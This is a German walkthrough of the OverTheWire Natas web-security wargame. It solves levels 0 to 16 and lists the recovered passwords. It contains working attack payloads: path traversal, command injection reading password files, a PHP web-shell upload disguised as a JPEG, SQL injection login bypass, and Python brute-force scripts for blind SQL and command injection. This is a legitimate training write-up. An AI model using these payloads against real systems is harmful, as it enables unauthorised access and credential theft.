Einleitung Wargames

OverTheWire.org bietet über 15 verschiedene Wargames an, welche verschiedene Schwierigskeitgrade haben. Wenn du den Begriff “Wargame” im Bezug zu Cyber Security zum ersten Mal hörst, fragst du dich bestimmt: “Was ist eigentlich ein Wargame?”.
Wargames sind Herausforderungen, entweder online oder offline als Virtuelle Maschine, in denen man versucht Sicherheitslücken auszunutzen und/oder Zugriff zu etwas zu erlangen. Sie sind teilweise sehr unterschiedlich was die benötigten Fähigkeiten, die Herausforderung und die Vorgehensweise anbelangt. Wargames werden von verschiedenen Internetseiten angeboten und haben teilweise eine große Community. Eine Liste von Wargame Anbietern kannst du hier finden.

Level 0

Nachdem wir uns auf http://natas0.natas.labs.overthewire.org/ mit dem Nutzernamen natas0 und Password natas0 angemeldet haben, sehen wir eine Seite mit dem Text You can find the password for the next level on this page..  Wenn wir uns den Seitenquelltext anzeigen lassen, finden wir bei Zeile 16 folgendes:

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Level 0 -> Level 1

Diesmal ist das Password für das nächste Level wieder im Seitenquelltext versteckt, allerdings wird der Rechtsklick der Maus blockiert. Das ist aber kein Problem für uns, da wir mit Strg + U uns trotzdem den Seitenquelltext anzeigen lassen können. Bei Zeile 17 finden wir dann folgendes:

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Level 1 -> Level 2

Wir sehen uns wieder zuerst den Seitenquelltext an. In Zeile 15 finden wir folgendes:

<img src="files/pixel.png">

Wenn wir nach http://natas2.natas.labs.overthewire.org/files/ gehen, sehen wir dort eine Datei users.txt.
In dieser steht:

# username:password
[...]
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
[...]

Level 2 -> Level 3

Wenn wir uns den Seitenquelltext ansehen, finden wir diesmal nur den Kommentar <!– No more information leaks!! Not even Google will find it this time… –>.
Sehen wir uns doch mal die robots.txt Datei an, welche bestimmte User-Agenten ausschließen kann, z.B. auch die Bots von Suchmaschinen.

User-agent: *
Disallow: /s3cr3t/

Der Ordner /s3cr3t/ wird also von Suchmaschinen ausgeschlossen… Sehen wir uns diesen mal an.
In dem Ordner befindet sich die Datei Users.txt mit dem Inhalt:

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 3 -> Level 4

Bei diesem Level müssen wir den Referrer veränder. Um das zu machen brauchen wir die Hilfe von Burp. Mit Burp können wir den Datenverkehr unterbrechen und Anfragen bearbeiten.
Wenn wir auf Refresh Page klicken und Burp gerade unseren Verkehr unterbricht, können wir unter headers den Referrer von natas4 zu natas5 ändern.

burp

Danach müssen wir das Request nur noch weiterleiten und schon wird uns das Passwort angezeigt.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 4 -> Level 5

Wenn wir uns einloggen, steht auf der Seite, dass wir keinen Zugriff haben, weil wir nicht eingeloggt sind. Das könnte eventuell daran liegen, dass ein Cookie falsch gesetzt ist.
Mit dem Browser Addon **EditThisCookie **können wir den Inhalt von Cookies sehen und bearbeiten.

editthiscookie

Es gibt also einen Cookie der loggedin heißt  und den Wert 0 besitzt. Wenn wir den Wert auf 1 setzen und die Seite neu laden, wird uns das Passwort für das nächste Level angezeigt.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 5 -> Level 6

Bei diesem Level hier müssen wir das richtige Password für das für Input Secret finden. Im Quelltext steht in Zeile 17:

include "includes/secret.inc";

Wenn wir nun zu http://natas6.natas.labs.overthewire.org/includes/secret.inc gehen, finden wir:

$secret = "FOEIUWGHFEEUHOFUOIU";

Jetzt müssen wir nur noch das Secret einfügen, absenden und geschafft.

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 6 -> Level 7

Im Seitenquelltext steht in Zeile 21:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

Wenn wir auf Home klicken sehen wir die URL http://natas7.natas.labs.overthewire.org/index.php?page=home

Hier können wir eine LFI/RFI Schwachstelle ausnutzen. Dafür müssen wir nur folgende URL eingeben:

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Jetzt wird uns das Password angezeigt: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 7 -> Level 8

Im Seitenquelltext sehen wir, dass unser Input mit der Variable $encodedSecret verglichen wird. Dazu wird unser Input erst in Base64 enkodiert, dann umgedreht und schließlich werden die Binär Daten in Hex konvertiert. Um an das richtige Secret zu kommen, müssen wir diesen Prozess umkehren.

$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

Dazu können wir den Interactiven Modus von PHP benutzen:

root@kali:~# php7.2 -a
Interactive mode enabled

php > echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
oubWYf2kBq

Das Secret ist also oubWYf2kBq.

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Level 8 -> Level 9

In Zeile 29 vom Quelltext finden wir folgendes: passthru(“grep -i $key dictionary.txt”); Wobei $key unser Input ist.
Es wird also ein Linux Befehl ausgeführt. Das können wir ausnutzen. Suchen wir zum Testen mal nach ; ls.
Durch das Semikolon wird der grep-Befehl beendet und ls wird ausgeführt. Unter /etc/natas_webpass befinden sich die Passwörter für alle Level.
Wir haben immer nur die Rechte, die Datei für das derzeitige und das nächste Level zu lesen. Benutzen wir:

; ls ../../../../etc/natas_webpass

Als Ausgabe werden uns die Passwort-Dateien aller Level aufgelistet. Lassen wir uns natas10 doch mit cat ausgeben.

;cat ../../../../etc/natas_webpass/natas10
Output: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 9 -> Level 10

Die Zeichen ; und & werden in diesem Level gefiltert, weswegen wir hier nicht wie in Level 9 vorgehen können.
Allerdings können wir uns grep von nutzen machen. Der Befehl grep -i nimmt als ersten Parameter das Suchwort und alle danach folgenden als Datei in der gesucht werden soll. Also können wir einfach /etc/natas_webpass/natas11 als zu durchsuchende Datei hinzunehmen.

Geben wir a /etc/natas_webpass/natas11 ein…
Der Buchstabe a scheint nicht im Passwort vorhanden zu sein.

Probieren wir u /etc/natas_webpass/natas11 aus.

Output:
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
[...]

Level 10 -> Level 11

Bei diesem Level haben wir einen XOR Verschlüsselten Cookie, welchen wir verändern müssen.
Der Quelltext ist wie folgt:

[...]  
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {  
  $key = '<censored>';  
  $text = $in;  
  $outText = '';

  // Iterate through each character  
  for($i=0;$i<strlen($text);$i++) {  
    $outText .= $text[$i] ^ $key[$i % strlen($key)];  
  }

  return $outText;  
}

function loadData($def) {  
  global $_COOKIE;  
  $mydata = $def;  
  if(array_key_exists("data", $_COOKIE)) {  
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);  
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {  
      if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {  
        $mydata['showpassword'] = $tempdata['showpassword'];  
        $mydata['bgcolor'] = $tempdata['bgcolor'];  
      }  
    }  
  }  
  return $mydata;  
}

function saveData($d) {  
  setcookie("data", base64_encode(xor_encrypt(json_encode($d))));  
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {  
  if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {  
    $data['bgcolor'] = $_REQUEST['bgcolor'];  
  }  
}

saveData($data);

?>

<h1>natas11</h1>  
<div id="content">  
<body style="background: <?=$data['bgcolor']?>;">  
Cookies are protected with XOR encryption<br/><br/>

<?  
if($data["showpassword"] == "yes") {  
  print "The password for natas12 is <censored><br>";  
}  
[...]  
?>

Im Cookie Editor können wir sehen, dass der Cookie data den Wert ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D enthält.

cookiemanager

Außerdem wissen wir dank des Quelltextes wie der entschlüsselte Wert lautet:

“showpassword”=>“no”, “bgcolor”=>"#ffffff"

Eine XOR Verschlüsselung ist einfach zu entschlüsseln, wenn man 2 der 3 folgenden Sachen weiß:

Der verschlüsselte Text, der entschlüsselte Text und der Schlüssel der zum verschlüsseln benutzt wird.
Wir wissen die ersten beiden Sachen. Wir können nun die xor_encrypt Funktion anpassen, um den Schlüssel herauszufinden.

#!/usr/bin/php
<? 
$cookie = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');

function xor_encrypt($in)
{ 
  $text = $in; 
  $key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
  $outText = '';

  // Iterate through each character
  for($i=0;$i<strlen($text);$i++) 
  { 
    $outText .= $text[$i] ^ $key[$i % strlen($key)]; 
  } 
  return $outText; 
} 

print xor_encrypt($cookie); 
?>

Wenn wir die Datei nun ausführen erhalten wir: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq

Der Schlüssel ist also qw8J

Wenn wir die Funktion erneut etwas anpassen, können wir verschlüsseln, was wir möchten.

>#!/usr/bin/php
<? 
function xor_encrypt($in)
{ 
  $text = json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"));
  $key = "qw8J";
  $outText = '';

  // Iterate through each characterfor($i=0;$i<strlen($text);$i++) 
  { 
    $outText .= $text[$i] ^ $key[$i % strlen($key)]; 
  } 
  return $outText; 
} 

print base64_encode(xor_encrypt()); ?>

Wenn wir die Funktion ausführen erhalten wir den Cookie ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

Ersetzen wir nun den Wert des Cookies data damit, müssen wir nur noch die Seite neu laden und es erscheint der Text

The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Level 11 -> Level 12

Bei diesem Level können wir eine JPEG Datei hochladen. Sehen wir uns mal den Quelltext an.

function genRandomString() {
  $length = 10;
  $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
  $string = "";

  for ($p = 0; $p < $length; $p++) {
    $string .= $characters[mt_rand(0, strlen($characters)-1)];
  }

  return $string;
  }

  function makeRandomPath($dir, $ext) {
  do {
    $path = $dir."/".genRandomString().".".$ext;
  } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
  $ext = pathinfo($fn, PATHINFO_EXTENSION);
  return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
  $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
  echo "File is too big";
} else {
  if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
  } else{
    echo "There was an error uploading the file, please try again!";
  }
}
} else {
?>

<form enctype="multipart/form-data" action="index.php" method="POST"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000" /> 
<input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" /> 
Choose a JPEG to upload (max 1KB):<br/> 
<input name="uploadedfile" type="file" /><br /> 
<input type="submit" value="Upload File" /> 
</form> 

Wenn wir eine Datei hochladen, wird bekommt diese einen zufälligen 10-stelligen Namen, die Endung .jpg und wird unter /upload/ gespeichert. Den Link zu der Datei bekommen wir danach angezeigt. Wir können ein PHP-Skript erstellen, welches für uns ein System-Kommando ausführt und müssen dafür sorgen, dass es mit der Endung .php in dem Ordner /upload/ gespeichert wird und nicht mit der Endung .jpg.

echo "<?php system(\"cat /etc/natas_webpass/natas13\"); ?>" > cutecat.jpg

Durch dieses Kommando erstellen wir ein PHP-Skript welches auf dem Server cat /etc/natas_webpass/natas13 ausführen wird. Das \ ist bei echo ein escape character. Ohne das \ würde der echo Befehl bei system(" enden. system führt bei PHP ein System Kommando aus und gibt den Output aus. Wird speichern das PHP-Skript als cutecat.jpg ab, wobei die Endung bei diesem Beispiel egal ist, da die Datei eh umbenannt wird und die Seite die Datei nicht auf ihre Endung überprüft.

Es gibt verschiedene Möglichkeiten, wie wir dafür sorgen können, dass unsere Datei nun als .php gespeichert wird.

Zum einen können wir Strg + Umschalt + I drücken um die Elemente der Seite zu untersuchen. Dann suchen wir nach dem verstecktem Input-Feld und können dort den Wert von filename ändern.

Element untersuchen

Danach müssen wir nur noch auf Upload File klicken, die Datei wird unter dem Namen gespeichert, welchen wir festgelegt haben und wenn wir durch den Link, welcher uns angezeigt wird, die Datei ausführen, bekommen wir das Passwort angezeigt.

Alternativ können wir auch Burp benutzen. Wenn wir das Upload Anfrage abfangen, können wir dort auch den Dateinamen ändern.

Burp

Wenn alles geklappt hat, bekommen wir das Password angzeigt.

jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 12 -> Level 13

Dieses Level ist eine Erweiterung zum vorherigen. Der Quelltext hat drei neue Zeilen dazu bekommen.

else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) { 
    echo "File is not an image"; 
}

Jetzt wird bei der Datei, welche wir hochladen, zusätzlich überprüft um was für einen Bildtyp es sich bei der Datei handelt. Dies wird durch exif_imagetype(datei) realisiert. exif_imagetype liest die ersten Bytes der Datei aus und überprüft anhand der Signatur um welchen Dateityp es sich handelt. Wenn wir etwas anderes als eine Bilddatei hochladen erhalten wir nur die Rückmeldung File is not an image.

root@kali:~# file cutecat.jpg 
cutecat.jpg: PHP script, ASCII text

Auf Wikipedia können wir eine Liste mit Signatur für verschiedene Dateitypen finden. Die Signatur für JPEGs ist FF D8 FF DB.

Hier gibt es auch wieder verschiedene Möglichkeiten, wie wir die Signatur an den Anfang unserer Datei einfügen können, sodass diese als JPEG erkannt wird.

1.

root@kali:~# echo -e "\xff\xd8\xff\xe0" > jpeg
root@kali:~# file jpeg
jpeg: JPEG image data

Dadurch haben wir nun die JPEG Signatur in der Datei jpeg gespeichert. Jetzt müssen wir nur noch unser PHP-Skript erstellen und die beiden Dateien zusammenführen.

root@kali:~# echo "<?php system(\"cat /etc/natas_webpass/natas14\"); ?>" > cutecat
root@kali:~# cat jpeg cutecat > cutecatjpg
root@kali:~# file cutecatjpg
cutecat2: JPEG image data
  1. Wir können auch den Hexeditor dafür benutzen.
root@kali:~# hexeditor -b cutecat

Viermal Strg + A drücken um null-Bytes zu erstellen, FF D8 FF DB eingeben und mit Strg + X speichern.

hexeditor

root@kali:~# file cutecat
cutecat: JPEG image data
  1. Wir laden unser Skript ganz normal hoch und fangen die Anfrage mit Burp ab. Wir kopieren dann die ASCII Kodierung der Signatur von Wikipedia und fügen diese vor dem Inhalt unserer Datei ein.

kopieren

einfügen bei burp

Natürlich dürfen wir nicht vergessen, wie im vorherigen Level, dafür zu sorgen, dass unsere Datei wieder mit der Endung .php gespeichert wird. Wenn alles funktioniert hat, bekommen wir wieder das Passwort angezeigt, wenn wir dem Link zu unserer Datei folgen.

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 13 -> Level 14

Sehen wir uns den Quelltext an:

[...]
if(array_key_exists("username", $_REQUEST)) 
  { 
  $link = mysql_connect('localhost', 'natas14', '<censored>'); 
  mysql_select_db('natas14', $link); 
  $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
  if(array_key_exists("debug", $_GET)) 
  { 
    echo "Executing query: $query<br>"; 
  } 
  if(mysql_num_rows(mysql_query($query, $link)) > 0) 
  { 
    echo "Successful login! The password for natas15 is <censored><br>"; 
  } 
  else 
  { 
    echo "Access denied!<br>"; 
  } 
  mysql_close($link);
[...]

Wir können die genaue SQL Abfrage sehen, welche gemacht wird:

SELECT * FROM users WHERE username="USER_INPUT" AND password="USER_INPUT"

Wir können nun eine ganz einfache SQL Injection machen, um an das Passwort zu kommen

username=test" OR "1"="1  
password=test" OR "1"="1

Dadurch erhalten wir folgende SQL Abfrage

SELECT * FROM users WHERE username="test" OR "1"="1" AND password="test" OR "1"="1"

Wir werden also also als irgendein beliebiger Benutzer eingeloggt.

http://natas14.natas.labs.overthewire.org/?username=test" OR "1"="1&password=test" OR "1"="1
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 14 -> Level 15

root@kali:~# vim bruteforce.py
import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
correct = ''
passwd = ''

for char in chars:
Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'}
r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
if 'exists' in r.text :
correct += char
print(correct)

for i in range(0,32):
for char in correct:
Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
if 'exists' in r.text :
passwd += char
print(passwd)
break
root@kali:~# python bruteforce.py
a
ac
ace
aceh
acehi
acehij
acehijm
acehijmn
acehijmnp
acehijmnpq
acehijmnpqt
acehijmnpqtw
acehijmnpqtwB
acehijmnpqtwBE
acehijmnpqtwBEH
acehijmnpqtwBEHI
acehijmnpqtwBEHIN
acehijmnpqtwBEHINO
acehijmnpqtwBEHINOR
acehijmnpqtwBEHINORW
acehijmnpqtwBEHINORW0
acehijmnpqtwBEHINORW03
acehijmnpqtwBEHINORW035
acehijmnpqtwBEHINORW0356
acehijmnpqtwBEHINORW03569
W
Wa
WaI
WaIH
WaIHE
WaIHEa
WaIHEac
WaIHEacj
WaIHEacj6
WaIHEacj63
WaIHEacj63w
WaIHEacj63wn
WaIHEacj63wnN
WaIHEacj63wnNI
WaIHEacj63wnNIB
WaIHEacj63wnNIBR
WaIHEacj63wnNIBRO
WaIHEacj63wnNIBROH
WaIHEacj63wnNIBROHe
WaIHEacj63wnNIBROHeq
WaIHEacj63wnNIBROHeqi
WaIHEacj63wnNIBROHeqi3
WaIHEacj63wnNIBROHeqi3p
WaIHEacj63wnNIBROHeqi3p9
WaIHEacj63wnNIBROHeqi3p9t
WaIHEacj63wnNIBROHeqi3p9t0
WaIHEacj63wnNIBROHeqi3p9t0m
WaIHEacj63wnNIBROHeqi3p9t0m5
WaIHEacj63wnNIBROHeqi3p9t0m5n
WaIHEacj63wnNIBROHeqi3p9t0m5nh
WaIHEacj63wnNIBROHeqi3p9t0m5nhm
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Level 15 -> Level 16

root@kali:~# vim bruteforce2.py
import requests 
from requests.auth import HTTPBasicAuth 

auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh') 

correct = '' 
passwd = '' 
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890' 
for char in allchars: 
 r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=anything$(grep ' + char + ' /etc/natas_webpass/natas17)', auth=auth) 

 if 'anything' not in r.text: 
 correct += char 
 print(correct) 

for i in range(32): 
 for char in correct: 
 r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=anything$(grep ^' + passwd + char + ' /etc/natas_webpass/natas17)', auth=auth) 

 if 'anything' not in r.text: 
 passwd = passwd + char 
 print(passwd) 
 break
root@kali:~# python bruteforce2.py 
b
bc
bcd
bcdg
bcdgh
bcdghk
bcdghkm
bcdghkmn
bcdghkmnq
bcdghkmnqr
bcdghkmnqrs
bcdghkmnqrsw
bcdghkmnqrswA
bcdghkmnqrswAG
bcdghkmnqrswAGH
bcdghkmnqrswAGHN
bcdghkmnqrswAGHNP
bcdghkmnqrswAGHNPQ
bcdghkmnqrswAGHNPQS
bcdghkmnqrswAGHNPQSW
bcdghkmnqrswAGHNPQSW3
bcdghkmnqrswAGHNPQSW35
bcdghkmnqrswAGHNPQSW357
bcdghkmnqrswAGHNPQSW3578
bcdghkmnqrswAGHNPQSW35789
bcdghkmnqrswAGHNPQSW357890
8
8P
8Ps
8Ps3
8Ps3H
8Ps3H0
8Ps3H0G
8Ps3H0GW
8Ps3H0GWb
8Ps3H0GWbn
8Ps3H0GWbn5
8Ps3H0GWbn5r
8Ps3H0GWbn5rd
8Ps3H0GWbn5rd9
8Ps3H0GWbn5rd9S
8Ps3H0GWbn5rd9S7
8Ps3H0GWbn5rd9S7G
8Ps3H0GWbn5rd9S7Gm
8Ps3H0GWbn5rd9S7GmA
8Ps3H0GWbn5rd9S7GmAd
8Ps3H0GWbn5rd9S7GmAdg
8Ps3H0GWbn5rd9S7GmAdgQ
8Ps3H0GWbn5rd9S7GmAdgQN
8Ps3H0GWbn5rd9S7GmAdgQNd
8Ps3H0GWbn5rd9S7GmAdgQNdk
8Ps3H0GWbn5rd9S7GmAdgQNdkh
8Ps3H0GWbn5rd9S7GmAdgQNdkhP
8Ps3H0GWbn5rd9S7GmAdgQNdkhPk
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Level 16 -> Level 17

Level 17 -> Level 18

Level 18 -> Level 19

Level 19 -> Level 20

Level 20 -> Level 21

Level 21 -> Level 22

Level 22 -> Level 23

Level 23 -> Level 24

Level 24 -> Level 25

Level 25 -> Level 26

Level 26 -> Level 27

Level 27 -> Level 28

Level 28 -> Level 29

Level 29 -> Level 30

Level 30 -> Level 31

Level 31 -> Level 32

Level 32 -> Level 33